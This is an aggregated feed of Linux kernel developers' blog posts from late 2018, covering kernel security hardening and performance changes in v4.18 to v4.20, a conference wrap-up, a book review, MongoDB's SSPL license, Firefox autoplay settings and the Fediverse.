Kees Cook: security things in Linux v4.20

Previously: v4.19.

Linux kernel v4.20 has been released today! Looking through the changes, here are some security-related things I found interesting:

stackleak plugin

Alexander Popov’s work to port the grsecurity STACKLEAK plugin to the upstream kernel came to fruition. While it had received Acks from x86 (and arm64) maintainers, it has been rejected a few times by Linus. With everything matching Linus’s expectations now, it and the x86 glue have landed. (The arch-specific portions for arm64 from Laura Abbott actually landed in v4.19.) The plugin tracks function calls (with a sufficiently large stack usage) to mark the maximum depth of the stack used during a syscall. With this information, at the end of a syscall, the stack can be efficiently poisoned (i.e. instead of clearing the entire stack, only the portion that was actually used during the syscall needs to be written). There are two main benefits from the stack getting wiped after every syscall. First, there are no longer “uninitialized” values left over on the stack that an attacker might be able to use in the next syscall. Next, the lifetime of any sensitive data on the stack is reduced to only being live during the syscall itself. This is mainly interesting because any information exposures or side-channel attacks from other kernel threads need to be much more carefully timed to catch the stack data before it gets wiped.

Enabling CONFIG_GCC_PLUGIN_STACKLEAK=y means almost all uninitialized variable flaws go away, with only a very minor performance hit (it appears to be under 1% for most workloads). It’s still possible that, within a single syscall, a later buggy function call could use “uninitialized” bytes from the stack from an earlier function. Fixing this will need compiler support for pre-initialization (this is under development already for Clang, for example), but that may have larger performance implications.

raise faults for kernel addresses in copy_*_user()

Jann Horn reworked x86 memory exception handling to loudly notice when copy_{to,from}_user() tries to access unmapped kernel memory. Prior this, those accesses would result in a silent error (usually visible to callers as EFAULT), making it indistinguishable from a “regular” userspace memory exception. The purpose of this is to catch cases where, for example, the unchecked __copy_to_user() is called against a kernel address. Fuzzers like syzcaller weren’t able to notice very nasty bugs because writes to kernel addresses would either corrupt memory (which may or may not get detected at a later time) or return an EFAULT that looked like things were operating normally. With this change, it’s now possible to much more easily notice missing access_ok() checks. This has already caught two other corner cases even during v4.20 in HID and Xen.

spectre v2 userspace mitigation

The support for Single Thread Indirect Branch Predictors (STIBP) has been merged. This allowed CPUs that support STIBP to effectively disable Hyper-Threading to avoid indirect branch prediction side-channels to expose information between userspace threads on the same physical CPU. Since this was a very expensive solution, this protection was made opt-in (via explicit prctl() or implicitly under seccomp()). LWN has a nice write-up of the details.

jump labels read-only after init

Ard Biesheuvel noticed that jump labels don’t need to be writable after initialization, so their data structures were made read-only. Since they point to kernel code, they might be used by attackers to manipulate the jump targets as a way to change kernel code that wasn’t intended to be changed. Better to just move everything into the read-only memory region to remove it from the possible kernel targets for attackers.

VLA removal finished

As detailed earlier for v4.17, v4.18, and v4.19, a whole bunch of people answered my call to remove Variable Length Arrays (VLAs) from the kernel. I count at least 153 commits having been added to the kernel since v4.16 to remove VLAs, with a big thanks to Gustavo A. R. Silva, Laura Abbott, Salvatore Mesoraca, Kyle Spiers, Tobin C. Harding, Stephen Kitt, Geert Uytterhoeven, Arnd Bergmann, Takashi Iwai, Suraj Jitindar Singh, Tycho Andersen, Thomas Gleixner, Stefan Wahren, Prashant Bhole, Nikolay Borisov, Nicolas Pitre, Martin Schwidefsky, Martin KaFai Lau, Lorenzo Bianconi, Himanshu Jha, Chris Wilson, Christian Lamparter, Boris Brezillon, Ard Biesheuvel, and Antoine Tenart. With all that done, “-Wvla” has been added to the top-level Makefile so we don’t get any more added back in the future.

per-task stack canaries, powerpc
For a long time, only x86 has had per-task kernel stack canaries. Other architectures would generate a single canary for the life of the boot and use it in every task. This meant that exposing a canary from one task would give an attacker everything they needed to spoof a canary in a separate attack in a different task. Christophe Leroy has solved this on powerpc now, integrating the new GCC support for the -mstack-protector-guard-reg and -mstack-protector-guard-offset options.

Given the holidays, Linus opened the merge window before v4.20 was released, letting everyone send in pull requests in the week leading up to the release. v4.21 is in the making. :) Happy New Year everyone!

Edit: clarified stackleak details, thanks to Alexander Popov. Added per-task canaries note too.

© 2018 – 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

December 24, 2018 11:59 PM

December 22, 2018

Pete Zaitcev: The New World

well I had to write a sysv init script today and I wished it was systemd

— moonman, 21 December 2018

December 22, 2018 04:41 AM

James Morris: Linux Security Summit Europe 2018 Wrap-up

The inaugural Linux Security Summit Europe (LSS-EU) was held in October, in Edinburgh, UK.

For 2018, the LSS program committee decided to add a new event in Europe, with the aim of fostering Linux security community engagement beyond North America. There are many Linux security developers and users in Europe who may not be able to obtain funding to travel to North America for the conference each year. The lead organizer and MC for LSS EU is Elena Reshetova, of Intel Finland.

This was my first LSS as a speaker, as I’ve always been the MC for the North American events. I provided a brief overview of the Linux kernel security subsystem.

Sub-maintainers of kernel security projects presented updates on their respective areas, and there were also several referred presentations.

Slides may be found here, while videos of all talks are available via this youtube playlist.

There are photos, too!

The event overall seemed very successful, with around 150 attendees. We expect to continue now to have both NA and EU LSS events each year, although there are some scheduling challenges for 2019, with several LF events happening closely together. From 2020 on, it seems we will have 4-5 months separation between the EU and NA events, which will work much better for all involved.

 

December 22, 2018 03:53 AM

December 20, 2018

Pete Zaitcev: And to round out the 2018

To quoth:

Why not walk down the wider path, using GNU/Linux as DOM0? Well, if you like the kernel Linux, by all means, do that! I prefer an well-engineered kernel, so I choose NetBSD. [...]

Unfortunately, NetBSD's installer now fails on many PCs from 2010 and later. [...]

Update 2018-03-11: I have given up on NetBSD/Xen and now use Gentoo GNU/Linux/Xen instead. The reason is that I ran into stability problems which survived many NetBSD updates.

You have to have a heart of stone not to laugh out loud.

P.S. Use KVM already, sheesh.

P.P.S. This fate also awaits people who don't like SystemD.

December 20, 2018 09:30 PM

December 18, 2018

Pete Zaitcev: Firefox 64 autoplay in Fedora 29

With one of the recent Firefox releases (current version is 64), autoplay videos began to play again, although they start muted now [1]. None of the previously-working methods work (e.g. about:config media.autoplay.enabled), the documented preference is not there in 64 (promised for 63: either never happened, or was removed). Extensions that purport to disable autoplay do not work.

The solution that does work is set media.autoplay.default to 1.

Finding the working option required a bit of effort. I'm sure this post will become obsolete in a few months, and add to the Internet noise that makes it harder to find a working solution when Mozilla changes something again. But hey. Everyting is shit, so whatever.

[1] Savour the bitterness of realization that an employee of Mozilla thought that autoplay was okay to permit as long as it was muted.

UPDATE 2019-04-10: They updated Firefox to v.66 "Quantum", right in the middle of F29. The above is not enough now. One must also set media.autoplay.enabled.user-gestures-needed to false. Apparently, it's a bug and may be fixed in the future.

December 18, 2018 05:53 PM

December 13, 2018

Pete Zaitcev: IBM PC XT

By whatever chance, I visited an old science laboratory where I played at times when I was a teenager. They still have a pile of old equipment, including the IBM PC XT clone that I tinkered with.

Back in the day, they also had a PDP-11, already old, which had a magnetic tape unit. They also had data sets on those tapes. The PC XT was a new hotness, and they wanted to use it for data visualization. It was a difficult task to find a place that could read the data off the tape and write to 5.25" floppies. Impossible, really.

I stepped in and went to connect the two over RS-232. I threw together a program in Turbo Pascal, which did the job of shuffling the characters between the MS-DOS and the mini, thus allowing to log in and initiate a transfer of the data. I don't remember if we used an ancient Kermit, or just printed the numbers in FORTRAN, then captured them on the PC.

The PDP-11 didn't survive for me to take a picture, but the PC XT did.

December 13, 2018 06:07 AM

December 09, 2018

Paul E. Mc Kenney: Parallel Programming: December 2018 Update

This weekend features a new release of Is Parallel Programming Hard, And, If So, What Can You Do About It?.

This release features Makefile-automated running of litmus tests (both with herd and litmus tools), catch-ups with recent Linux-kernel changes, a great many consistent-style changes (including a new style-guide appendix), improved code cross-referencing, and a great many proofreading changes, all courtesy of Akira Yokosawa. SeongJae Park, Imre Palik, Junchang Wang, and Nicholas Krause also contributed much-appreciated improvements and fixes. This release also features numerous epigraphs, modernization of sample code, many random updates, and larger updates to the memory-ordering chapter, with much help from my LKMM partners in crime, whose names are now enshrined in the LKMM section of the Linux-kernel MAINTAINERS file.

As always, git://git.kernel.org/pub/scm/linux/kernel/git/paulmck/perfbook.git will be updated in real time.

Oh, and the first edition is now available on Amazon in English as well as Chinese. I have no idea how this came about, but there it is!

December 09, 2018 07:42 PM

December 03, 2018

Dave Airlie (blogspot): Open source compute stack talk from Linux Plumbers Conference 2018

I spoke at Linux Plumbers Conference 2018 in Vancouver a few weeks ago, about CUDA and the state of open source compute stacks.

The video is now available.

https://www.youtube.com/watch?v=d94N2Lu4x9s


December 03, 2018 01:43 AM

December 02, 2018

Pete Zaitcev: Twitter

First things first: I am sorry for getting passive-aggressive on Twitter, although I was mad and the medium encourages this sort of thing. But this is the world we live in: the way to deal with computers is to google the symptoms, and hope that you don't have to watch a video. Something about this world disagrees with me so much, that I almost boycott Wikipedia and Stackoverflow. "Almost" means that I go very far, even Read The Fine Manuals, before I resort to them. As the path in tweet indicated, I built Ceph from source in order to debug the problem. But as the software stacks get thicker and thicker, source gets less and less useful, or at least it loses competition to googling for symptoms. My only hope at this point is for the merciful death take me away before these trends destroy the human civilization.

December 02, 2018 04:22 AM

November 04, 2018

Paul E. Mc Kenney: Book review: "Skin in the Game: Hidden Asymmetries in Daily Life"

Antifragile” was the last volume in Nassim Taleb's Incerto series, but it has lost that distinction with the publication of “Skin in the Game: Hidden Asymmetries in Daily Life”. This book covers a great many topics, but I will focus on only a few that relate most closely to my area of expertise.

Chapter 2 is titled “The Most Intolerant Wins: The Dominance of a Stubborn Minority”. Examples include kosher and halal food, the English language (I plead guilty!!!), and many others besides. In all cases, if the majority is not overly inconvenienced by the strongly expressed needs or desires of the minority, the minority's preferences will prevail. On the one hand, I have no problem eating either kosher or halal food, so would be part of the compliant majority in that case. On the other hand, although I know bits and pieces of several languages, the only one I am fluent in is English, and I have attended gatherings where the language was English solely for my benefit. But there are limits. For example, if I were to attend a gathering in certain parts of (say) rural India or China, English might not be within the realm of possibility.

But what does this have to do with parallel programming???

This same stubborn-minority dominance appears in software, including RCU. Very few machines have more than a few tens of CPUs, but RCU is designed to accommodate thousands. Very few systems run workloads featuring aggressive real-time requirements, but RCU is designed to support low latencies (and even more so the variant of RCU present in the -rt patchset). Very few systems allow physical removal of CPUs while the systems is running, but RCU is designed to support that as well. Of course, as with human stubborn minorities, there are limits. RCU handles systems with a few thousand CPUs, but probably would not do all that well on a system with a few million CPUs. RCU supports deep sub-millisecond real-time latencies, but not sub-microsecond latencies. RCU supports controlled removal and insertion of CPUs, but not surprise removal or insertion.

Chapter 6 is titled Intellectual Yet Idiot (with the entertaining subtext “Teach a professor how to deadlift”), and, as might be expected from the title, takes a fair number of respected intellectual to task, for but two examples, Cass Sunstein and Richard Thaler. I did find the style of this chapter a bit off-putting, but I happened to read Michael Lewis's “The Undoing Project” at about the same time. This informative and entertaining book covers the work of Daniel Kahneman and Amos Tversky (whose work helped to inform that of Sunstein and Thaler), but I found the loss-aversion experiments to be unsettling. After all, what does losing (say) $100 really mean? That I will be sad for a bit? That I won't be able to buy that new book I was looking forward to reading? That I don't get to eat dinner tonight? That I go hungry for a week? That I starve to death? I just might give a very different answer in these different scenarios, mightn't I?

This topic is also covered by Jared Diamond in his most excellent book entitled “The World Until Yesterday”. In the “Scatter your land” section, Diamond discusses how traditional farmers plant multiple small and widely separated plots of land. This practice puzzled anthropologists for some time, as it does the opposite of optimize yields and minimize effort. Someone eventually figured out that because these traditional farmers had no way to preserve food and limited opportunities to trade it, there was no value in producing more food than they could consume. But there was value in avoiding a year in which there was no food, and farming different crops in widely separated locations greatly decreased the odds that all their crops in all their plots would fail, thus in turn minimizing the probability of starvation. In short, these farmers were not optimizing for maximum average production, but rather for maximum probability of survival.

And this tradeoff is central to most of Taleb's work to date, including “Skin in the Game”.

But what does this have to do with parallel programming???

Quite a bit, as it turns out. In theory, RCU should just run its state machine and be happy. In practice, there are all kinds of things that can stall its state machine, ranging from indefinitely preempted readers to long-running kernel threads refusing to give up the CPU to who knows what all else. RCU therefore contains numerous forward-progress checks that reduce performance slightly but which also allow RCU to continue working when the going gets rough. This sort of thing is baked even more deeply into the physical engineering disciplines in the form of the fabled engineering factor of safety. For example, a bridge might be designed to handle three times the heaviest conceivable load, thus perhaps surviving a black-swan event such as a larger-than-expected earthquake or tidal wave.

Returning to Skin in the Game, Taleb makes much of the increased quality of decisions when the decider is directly affected by them, and rightly so. However, I became uneasy about cases where the decision and effect are widely separated in time. Taleb does touch obliquely on this topic in a section entitled “How to Put Skin in the Game of Suicide Bombers”, but does not address this topic in more prosaic settings. One could take a survival-based approach, arguing that tomorrow matters not unless you survive today, but in the absence of a very big black swan, a large fraction of the people alive today will still be alive ten years from now.

But what does this have to do with parallel programming???

There is a rather interesting connection, especially when you consider that Linux-kernel RCU's useful lifespan probably exceeds my own. This is not a new thought, and is in fact why I have put so much energy into speaking and writing about RCU. I also try my best to make RCU able to stand up to whatever comes its way, with varying degrees of success over the years.

However, beyond a certain point, this practice is labeled “overengineering”, which is looked down upon within the Linux kernel community. And with good reason: Many of the troubles one might foresee will never happen, and so the extra complexity added to deal with those troubles will provide nothing but headaches for no benefit. In short, my best strategy is to help make sure that there are bright, capable, and motivated people to look after RCU after I am gone. I therefore intend to continue writing and speaking about RCU. :–)

November 04, 2018 03:54 AM

October 30, 2018

Pete Zaitcev: Where is Amazon?

Imagine, purely hypothetically, that you were a kernel hacker working for Red Hat and for whatever reason you wanted to find a new challenge at a company with a strong committment to open source. What are the possibilities?

To begin with, as the statistics from the Linux Foundation's 2016 report demonstrate, you have to be stark raving mad to leave Red Hat. If you do, Intel and AMD look interesting (hello, Alan Cox). IBM is not bad, although since yesterday, you don't need to quit Red Hat to work for IBM anymore. Even Google, famous for being a black hole that swallows good hackers who are never heard from again, manages to put up a decent showing, Fuchsia or no. Facebook looks unimpressive (no disrespect to DaveJ intended).

Now, the no-shows. Both of them hail from Seattle, WA: Microsoft and Amazon. Microsoft made an interesting effort to adopt Linux into its public cloud, but their strategy was to make Red Hat do all the work. Well, as expected. Amazon, though, is a problem. I managed to get into an argument with David "dwmw2" Woodhouse on Facebook about it, where I brought up a somewhat dated article at The Register. The central claim is, the lack of Amazon's contribution is the result of the policy rolled all the way from the top.

(...) as far as El Reg can tell, the internet titan has submitted patches and other improvements to very few projects. When it does contribute, it does so typically via a third party, usually an employee's personal account that is not explicitly linked to Amazon.

I don't know if this culture can be changed quickly, even if Bezos suddenly changes his mind.

October 30, 2018 03:26 AM

October 25, 2018

Davidlohr Bueso: Linux v4.19: Performance Goodies

This post marks one year since I began doing these kernel performance goodies write ups,  starting from v4.14. And this week Greg released Linux v4.19, so here are some of the changes related to software optimizations, performance and scalability topics across various subsystems.

epoll: loosen irq safety when possible

The epoll code uses an irq-safe spinlock to protect concurrent operations to the ready-event linked list. However, with the exception of the callback done from the wakequeues, the calls to the spinlock are never done in irq context, and therefore there is really no need to save and restore interrupts each time the lock is acquired and released. For example, on x86, a POPF (irqrestore) instruction can be quite expensive as it changes all the flags and therefore potentially heavy on dependencies. These changes yield some measurable results on a range of epoll_wait(2) microbenchmarks, around 7-20% in raw throughput. This is unsurprising as PUSHF + POPF is  more expensive than STI + CLI.
[Commit 002b343669c4, 304b18b8d6af, 92e641784055, 679abf381a18]

sched/numa:  migrate pages to local nodes quicker early in the lifetime of a task

Automatic NUMA Balancing uses a multi-stage pass to decide whether a page should migrate to a local node. This filter avoids excessive ping-ponging if a page is shared or used by threads that migrate cross-node frequently. Threads inherit both page tables and the preferred node ID from the parent. This means that threads can trigger hinting faults earlier than a new task which delays scanning for a number of seconds. As it can be load balanced very early in its lifetime there can be an unnecessary delay before it starts migrating thread-local data. This patch migrates private pages faster early in the lifetime of a thread using the sequence counter as an identifier of new tasks.
[Commit 37355bdc5a12]
 

rcu: check if GP already requested

This commit makes rcu_nocb_wait_gp() check to see if the current CPU already knows about the needed grace period having already been requested.  If so, it avoids acquiring the corresponding leaf rcu_node structure's lock, thus decreasing contention.  This optimization is intended for cases where either multiple leader rcu kthreads are running on the same CPU or these kthreads are running on a non-offloaded (e.g., housekeeping) CPU.
[Commit ab5e869c1f7a]

cpufreq/schedutil: take into account time spent in irq

Time being spent in interrupt handlers was not being accounted for in the CPU utilization when selecting an operating performance point. This can be a significant amount of time which is reported in the normal context time window. The new CPU utilization is yields a 10% performance boost on iperf workloads.
[Commit 9033ea11889f]

mm/page_alloc: enlarge zone's batch size

The page allocator will first try to use a percpu set of pages, then if all used up, ask the Buddy for a batch of pages. The size of this batch can have a number of consequences, including performance. The last time this magic number was increased was 13 years ago, and there have been numerous hardware improvements since then. As such a recent study with allocator intensive benchmarks, shows that doubling the size of the batch can yield improvements on larger/modern machines.
[Commit d8a759b57035]

mm: skip invalid pages block at a time in zero_resv_unresv()

The role of zero_resv_unavail() is to make sure that every struct page that is allocated but is not backed by memory that is accessible by kernel is zeroed and not in some uninitialized state. Since struct pages are allocated in blocks we can skip pageblock_nr_pages at a time, when the first one is found to be invalid. This optimization may help since now on x86 every hole in e820 maps is marked as reserved in memblock, and thus will go through this function.
[Commit 720e14ebec64]

kvm, x86: implement paravirt "send IPI" hypercall

Replace sending IPIs one by one for xAPIC physical mode by a single hypercall (vmexit). This patchset lets a guest send multicast IPIs, with at most 128 destinations per hypercall in 64-bit mode and 64 vCPUs per hypercall in 32-bit mode. An IPI microbenchmark shows non-trivial performance improvements for broadcast IPIs (send IPI to all online CPUs and force them to take/drop a spinlock).
[Commit 4180bf1b655a]

arm64: use queued spinlocks

Similar to x86, replace the old ticket spinlocks with fair qspinlocks and make use of MCS features as well as better performance under virtualization. This is particularly suitable for larger multicore machines.
[Commit c11090474d70]

October 25, 2018 06:19 PM

October 22, 2018

Kees Cook: security things in Linux v4.19

Previously: v4.18.

Linux kernel v4.19 was released today. Here are some security-related things I found interesting:

L1 Terminal Fault (L1TF)

While it seems like ages ago, the fixes for L1TF actually landed at the start of the v4.19 merge window. As with the other speculation flaw fixes, lots of people were involved, and the scope was pretty wide: bare metal machines, virtualized machines, etc. LWN has a great write-up on the L1TF flaw and the kernel’s documentation on L1TF defenses is equally detailed. I like how clean the solution is for bare-metal machines: when a page table entry should be marked invalid, instead of only changing the “Present” flag, it also inverts the address portion so even a speculative lookup ignoring the “Present” flag will land in an unmapped area.

protected regular and fifo files

Salvatore Mesoraca implemented an O_CREAT restriction in /tmp directories for FIFOs and regular files. This is similar to the existing symlink restrictions, which take effect in sticky world-writable directories (e.g. /tmp) when the opening user does not match the owner of the existing file (or directory). When a program opens a FIFO or regular file with O_CREAT and this kind of user mismatch, it is treated like it was also opened with O_EXCL: it gets rejected because there is already a file there, and the kernel wants to protect the program from writing possibly sensitive contents to a file owned by a different user. This has become a more common attack vector now that symlink and hardlink races have been eliminated.

syscall register clearing, arm64

One of the ways attackers can influence potential speculative execution flaws in the kernel is to leak information into the kernel via “unused” register contents. Most syscalls take only a few arguments, so all the other calling-convention-defined registers can be cleared instead of just left with whatever contents they had in userspace. As it turns out, clearing registers is very fast. Similar to what was done on x86, Mark Rutland implemented a full register-clearing syscall wrapper on arm64.

Variable Length Array removals, part 3

As mentioned in part 1 and part 2, VLAs continue to be removed from the kernel. While CONFIG_THREAD_INFO_IN_TASK and CONFIG_VMAP_STACK cover most issues with stack exhaustion attacks, not all architectures have those features, so getting rid of VLAs makes sure we keep a few classes of flaws out of all kernel architectures and configurations. It’s been a long road, and it’s shaping up to be a 4-part saga with the remaining VLA removals landing in the next kernel. For v4.19, several folks continued to help grind away at the problem: Arnd Bergmann, Kyle Spiers, Laura Abbott, Martin Schwidefsky, Salvatore Mesoraca, and myself.

shift overflow helper
Jason Gunthorpe noticed that while the kernel recently gained add/sub/mul/div helpers to check for arithmetic overflow, we didn’t have anything for shift-left. He added check_shl_overflow() to round out the toolbox and Leon Romanovsky immediately put it to use to solve an overflow in RDMA.

Edit: I forgot to mention this next feature when I first posted:

trusted architecture-supported RNG initialization

The Random Number Generator in the kernel seeds its pools from many entropy sources, including any architecture-specific sources (e.g. x86’s RDRAND). Due to many people not wanting to trust the architecture-specific source due to the inability to audit its operation, entropy from those sources was not credited to RNG initialization, which wants to gather “enough” entropy before claiming to be initialized. However, because some systems don’t generate enough entropy at boot time, it was taking a while to gather enough system entropy (e.g. from interrupts) before the RNG became usable, which might block userspace from starting (e.g. systemd wants to get early entropy). To help these cases, Ted T’so introduced a toggle to trust the architecture-specific entropy completely (i.e. RNG is considered fully initialized as soon as it gets the architecture-specific entropy). To use this, the kernel can be built with CONFIG_RANDOM_TRUST_CPU=y (or booted with “random.trust_cpu=on“).

That’s it for now; thanks for reading. The merge window is open for v4.20! Wish us luck. :)

© 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

October 22, 2018 11:17 PM

October 16, 2018

Matthew Garrett: Initial thoughts on MongoDB's new Server Side Public License

MongoDB just announced that they were relicensing under their new Server Side Public License. This is basically the Affero GPL except with section 13 largely replaced with new text, as follows:

If you make the functionality of the Program or a modified version available to third parties as a service, you must make the Service Source Code available via network download to everyone at no charge, under the terms of this License. Making the functionality of the Program or modified version available to third parties as a service includes, without limitation, enabling third parties to interact with the functionality of the Program or modified version remotely through a computer network, offering a service the value of which entirely or primarily derives from the value of the Program or modified version, or offering a service that accomplishes for users the primary purpose of the Software or modified version.

“Service Source Code” means the Corresponding Source for the Program or the modified version, and the Corresponding Source for all programs that you use to make the Program or modified version available as a service, including, without limitation, management software, user interfaces, application program interfaces, automation software, monitoring software, backup software, storage software and hosting software, all such that a user could run an instance of the service using the Service Source Code you make available.


MongoDB admit that this license is not currently open source in the sense of being approved by the Open Source Initiative, but say:We believe that the SSPL meets the standards for an open source license and are working to have it approved by the OSI.

At the broadest level, AGPL requires you to distribute the source code to the AGPLed work[1] while the SSPL requires you to distribute the source code to everything involved in providing the service. Having a license place requirements around things that aren't derived works of the covered code is unusual but not entirely unheard of - the GPL requires you to provide build scripts even if they're not strictly derived works, and you could probably make an argument that the anti-Tivoisation provisions of GPL3 fall into this category.

A stranger point is that you're required to provide all of this under the terms of the SSPL. If you have any code in your stack that can't be released under those terms then it's literally impossible for you to comply with this license. I'm not a lawyer, so I'll leave it up to them to figure out whether this means you're now only allowed to deploy MongoDB on BSD because the license would require you to relicense Linux away from the GPL. This feels sloppy rather than deliberate, but if it is deliberate then it's a massively greater reach than any existing copyleft license.

You can definitely make arguments that this is just a maximalist copyleft license, the AGPL taken to extreme, and therefore it fits the open source criteria. But there's a point where something is so far from the previously accepted scenarios that it's actually something different, and should be examined as a new category rather than already approved categories. I suspect that this license has been written to conform to a strict reading of the Open Source Definition, and that any attempt by OSI to declare it as not being open source will receive pushback. But definitions don't exist to be weaponised against the communities that they seek to protect, and a license that has overly onerous terms should be rejected even if that means changing the definition.

In general I am strongly in favour of licenses ensuring that users have the freedom to take advantage of modifications that people have made to free software, and I'm a fan of the AGPL. But my initial feeling is that this license is a deliberate attempt to make it practically impossible to take advantage of the freedoms that the license nominally grants, and this impression is strengthened by it being something that's been announced with immediate effect rather than something that's been developed with community input. I think there's a bunch of worthwhile discussion to have about whether the AGPL is strong and clear enough to achieve its goals, but I don't think that this SSPL is the answer to that - and I lean towards thinking that it's not a good faith attempt to produce a usable open source license.

(It should go without saying that this is my personal opinion as a member of the free software community, and not that of my employer)

[1] There's some complexities around GPL3 code that's incorporated into the AGPLed work, but if it's not part of the AGPLed work then it's not covered

comment count unavailable comments

October 16, 2018 10:44 PM

October 15, 2018

Davidlohr Bueso: Linux v4.18: Performance Goodies

Linux v4.18 has been out a two months now; making this post a bit late, but still in time before the next release. Also so much drama in the CoC to care about performance topics :P As always comes with a series of performance enhancements and optimizations across subsystems.

locking: avoid pointless TEST instructions

A number of places within locking primitives have been optimized to avoid superfluous test instructions for the CAS return by relying on try_cmpxchg, generating slightly better code for x86-64 (for arm64 there is really no difference). Such have been the cases for mutex fastpath (uncontended case) and queued spinlocks.
[Commit c427f69564e2, ae75d9089ff7]

locking/mcs: optimize cpu spinning

Some architectures, such as arm64,  can enter low-power standby state (spin-waiting) instead of purely spinning on a condition. This is applied to the MCS spin loop, which in turn directly helps queued spinlocks. On x86, this can also be cheaper than spinning on smp_load_acquire().
[Commit 7f56b58a92aa]

mm/mremap: reduce amount of TLB shootdowns

It was discovered that on a heavily dominated mremap workload, the amount of TLB flushes was excessive causing overall performance issues. By removing the LATENCY_LIMIT magic number to handle TLB flushes on a PMD boundary instead of every 64 pages,  the amount of shootdowns can be redced by a factor of 8 in the ideal case.  The LATENCY_LIMIT was almost certainly used originally to limit the PTL hold times but the latency savings are likely shadowed by the cost of IPIs in many cases.
[Commit 37a4094e828f]

mm: replace mmap_sem to protect cmdline and environ procfs files

Reducing (ab)users of the mmap_sem is always good for general address space performance. Introduce a new mm->arg_lock to protect against races when handling /proc/$PID/{cmdline,environ} files, this removes (mostly) the semaphore's requirements.
[Commit 88aa7cc688d4]

mm/hugetlb: make better use of page clearing optimization

Pass the fault address (address of the sub-page to access) to the nopage fault handler to better use the general huge page clearing optimization. This allows the sub-page to access to be cleared last to avoid the cache lines of to access sub-page to be evicted when clearing other sub-pages. Performance improvements were reported for vm-scalability.anon-w-seq  workload under hugetlbfs, reducing ~30% throughput.
[Commit 285b8dcaacfc]

sched: don't schedule threads on pre-empted vCPUs

It can be determined whether a vCPU is running to prioritize CPUs when scheduling threads. If a vCPU has been pre-empted, it will incur the extra cost of VMENTER and the time it actually spends to be running on the host CPU. If we had other vCPUs which were actually running on the host CPU and idle we should schedule threads there.
[Commit 247f2f6f3c70, 943d355d7fee]

sched/numa: Stagger NUMA balancing scan periods for new threads

It is redundant and counter productive for threads sharing an address space to change the protections to trap NUMA faults. Potentially only one thread is required but that thread may be idle or it may not have any locality concerns and pick an unsuitable scan rate. This patch uses independent scan period but they are staggered based on the number of address space users when the thread is created.

The intent is that threads will avoid scanning at the same time and have a chance to adapt their scan rate later if necessary. This reduces the total scan activity early in the lifetime of the threads. The different in headline performance across a range of machines and workloads is marginal but the system CPU usage is reduced as well as overall scan activity.
[Commit 137844759843]

block/bfq: postpone rq preparation to insert or merge

A lock contention point is removed (see patch for details and justification) by postponing request preparation to insertion or merging, as lock needs to be grabbed any longer in the prepare_request hook.
[Commit 18e5a57d7987]

btrfs: improve rmdir performance for large directories

When checking if a directory can be deleted, instead of ensuring all its children have been processed,  this optimization keeps track of the directory index offset of the child last checked in the last call to can_rmdir(), and then use it as the starting point for future calls. The changes were shown to yield massive performance benefits; for test directory with two million files being deleted the runtime is reduced from half an hour to less than two seconds.
[Commit 0f96f517dcaa]



KVM: VMX: Optimize tscdeadline timer latency

Add the advance tscdeadline expiration support to which the tscdeadline timer is emulated by VMX preemption timer to reduce the hypervisor lantency (handle_preemption_timer -> vmentry). The guest can also set an expiration that is very small in that case we set delta_tsc to 0, leading to an immediately vmexit when delta_tsc is not bigger than advance ns. This patch can reduce ~63% latency for kvm-unit-tests/tscdeadline_latency when testing busy waits.
[Commit c5ce8235cffa]

net/sched: NOLOCK qdisc performance enhancements and  fixes

There have been various performance related core changes to the NOLOCK qdisc code. The first begins with reducing the atomic operations of __QDISC_STATE_RUNNING. The bit is flipped twice per packet in the uncontended scenario with packet rate below the line rate: on packed dequeue and on the next, failing dequeue attempt. The changes simplify the qdisc. The changes moves the bit manipulation into the qdisc_run_{begin,end} helpers, so that the bit is now flipped only once per packet, with measurable performance improvement in the uncontended scenario.

Later, the above is actually replaced by using a sequence spinlock instead of the atomic approach address pfifo_fast performance regressions. There is also a reduction in the Qdisc struct memory footprint (spanning a cacheline less).
[Commit 96009c7d500e, 021a17ed796b, e9be0e993d95]

lib/idr: improve scalability by reducing IDA lock granularity

Improve the scalability of the IDA by using the per-IDA xa_lock rather than the global simple_ida_lock.  IDAs are not typically used in performance-sensitive locations, but since we have this lock anyway, we can use it.
[Commit b94078e69533

x86-64: micro-optimize __clear_put()

Use immediate constants and saves two registers.
[Commit 1153933703d9]

arm64: select ARCH_HAS_FAST_MULTIPLIER

It is probably safe to assume that all Armv8-A implementations have a multiplier whose efficiency is comparable or better than a sequence of three or so register-dependent arithmetic instructions. Select ARCH_HAS_FAST_MULTIPLIER to get ever-so-slightly nicer codegen in the few dusty old corners which care.
[Commit e75bef2a4fe2]

October 15, 2018 08:19 PM

October 11, 2018

Pete Zaitcev: I'd like to interject for a moment

In a comment on the death of G+, elisteran brought up something that long annoyed me out of all proportion with its actual significance. What do you call a collection of servers communicating through NNTP? You don't call them "INN", you call them "Usenet". The system of hosts communicating through SMTP is not called "Exim", it is called "e-mail". But when someone wants to escape G+, they often consider "Mastodon". Isn't it odd?

Mastodon is merely an implementation of Fediverse. As it happens, only one of my Fediverse channels runs on Mastodon (the Japanese language one at Pawoo). Main one still uses Gnusocial, the anime one was on Gnusocial and migrated to Pleroma a few months ago. All of them are communicating using the OStatus protocol, although a movement is afoot to switch to ActivityPub. Hopefully it's more successful than the migration from RSS to Atom was.

Yet, I noticed that a lot of people fall to the idea that Mastodon is an exclusive brand. Rarely one has to know or care what MTA someone else uses. Microsoft was somewhat successful in establishing Outlook as such a powerful brand to the exclusion of the compatible e-mail software. The maintainer of Mastodon is doing his hardest to present it as a similar brand, and regrettably, he's very successful at that.

I guess what really drives me mad about this is how Eugen uses his mindshare advanage to drive protocol extensions. All of Fediverse implementations generaly communicate freely with one another, but as Pleroma and Mastodon develop, they gradually leave Gnusocial behind in features. In particular, Eugen found a loophole in the protocol, which allows to attach pictures without using up the space in the message for the URL. When Gnusocial displays a message with attachment, it only displays the text, not the picture. This acutally used to be a server setting, in case you want to safe your instance from NSFW imagery and save a little bandwidth. But these days pictures are so prevalent, that it's pretty much impossible to live without receiving them. In this, Eugen has completed the "extend" phase and is moving onto "extinguish".

